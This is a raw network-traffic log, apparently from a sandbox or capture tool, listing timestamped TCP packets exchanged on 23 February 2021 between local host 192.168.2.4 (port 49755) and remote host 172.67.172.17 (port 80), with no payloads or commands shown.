Feb 23, 2021 15:31:25.999557018 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.999573946 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.999593973 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.999627113 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.999633074 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.000510931 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.000529051 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.000545979 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.000567913 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.000586987 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.000602961 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.000655890 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.000673056 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.001606941 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.001630068 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.001651049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.001667976 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.001683950 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.001699924 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.001729965 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.002321005 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.002340078 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.002357006 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.002391100 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.002408028 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.002408028 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.002424955 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.002424955 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.002429008 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.002466917 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.003293991 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.003314018 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.003330946 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.003346920 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.003364086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.003380060 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.003427982 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.003448963 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.004199982 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.004223108 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.004240990 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.004256964 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.004273891 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.004290104 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.004306078 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.004322052 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.005110979 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.005131006 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.005146980 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.005162954 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.005179882 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.005196095 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.005212069 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.005218029 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.005238056 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.005835056 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.006083965 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.006103992 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.006119967 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.006136894 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.006153107 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.006167889 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.006190062 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.007031918 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.007062912 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.007076025 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.007080078 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.007086039 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.007097960 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.007117987 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.007137060 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.007158041 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.007162094 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.007972956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.007992029 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.008011103 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.008028984 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.008044958 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.008061886 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.008203983 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.008222103 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.008227110 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.008889914 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.008908033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.008924007 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.008939981 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.008955956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.008971930 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.009866953 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.009886980 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.009902000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.009918928 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.009936094 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.009955883 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.009958982 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.009984970 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.009987116 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.010807037 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.010831118 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.010873079 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.010890007 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.010890961 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.010909081 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.010931969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.010956049 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.010960102 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.011703014 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.011723042 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.011739969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.011753082 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.011773109 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.011792898 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.011827946 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.011842966 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.012737989 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.012757063 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.012782097 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.012821913 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.012840033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.012876987 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.012892008 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.012912989 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.013004065 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.013588905 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.013607979 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.013633966 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.013665915 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.013684988 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.013701916 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.013712883 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.013714075 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.013763905 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.014444113 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.014462948 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.014482975 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.014499903 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.014516115 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.014532089 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.014533043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.014641047 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.015345097 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.015383005 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.015403032 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.015420914 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.015438080 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.015454054 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.015506029 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.015523911 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.016175985 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.016199112 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.016216993 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.016232967 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.016251087 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.016268015 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.016288996 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.016304016 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.017033100 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.017054081 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.017070055 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.017086029 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.017102957 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.017118931 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.017204046 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.017222881 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.017879009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.017898083 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.017911911 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.017924070 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.017936945 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.017954111 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.018013954 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.018029928 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.018738031 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.018769026 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.018786907 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.018804073 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.018821001 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.018838882 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.018883944 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.018897057 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.019582033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.019604921 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.019622087 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.019638062 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.019654036 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.019671917 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.019709110 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.019742012 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.021316051 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021352053 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021372080 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021414995 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021430016 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.021433115 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021450043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021466970 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021485090 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021502972 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.021502972 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021507025 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.021522045 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021538019 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021554947 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021560907 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.021564007 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.021572113 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.021878004 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.025212049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025244951 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025264978 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025283098 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025300980 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025319099 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025335073 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025352001 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025367975 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025403023 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025418043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025420904 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.025430918 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025439024 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.025441885 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.025444031 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025456905 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025474072 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025489092 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.025492907 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025511026 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025526047 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025542021 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025557995 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025574923 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025579929 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.025583029 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.025592089 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025609016 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025628090 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025645971 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025650024 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.025655031 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.025662899 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025679111 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025695086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025707960 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.025711060 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.025944948 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025965929 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025983095 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.025999069 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.026015997 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.026034117 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.026053905 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.026061058 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.026076078 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.026597977 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.026925087 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.026951075 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.026973009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027002096 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027005911 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.027026892 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027049065 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027061939 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.027074099 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.027076006 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027335882 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.027812004 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027838945 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027867079 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027894020 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027914047 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027939081 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027956963 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.027962923 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.027966022 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.027978897 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.028721094 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.028750896 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.028774977 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.028796911 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.028819084 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.028841019 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.028846979 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.028862953 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.028901100 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.028908014 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.029597044 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.029623985 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.029644966 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.029669046 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.029690981 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.029696941 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.029716015 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.029737949 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.029799938 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.029808044 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.030481100 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.030513048 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.030536890 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.030560017 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.030584097 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.030603886 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.030622959 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.030627966 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.030638933 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.030852079 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.031313896 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.031341076 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.031363010 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.031384945 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.031404972 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.031424999 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.031441927 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.031447887 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.031449080 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.032196045 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.032226086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.032247066 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.032262087 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.032267094 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.032274008 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.032288074 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.032308102 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.032327890 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.032330036 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.032330990 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.032351971 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033168077 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033191919 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033210993 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033227921 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.033231974 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033237934 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.033257008 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033299923 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.033303022 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.033727884 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033761978 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033788919 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033813000 CET	80	49755	172.67.172.17	192.168.2.4
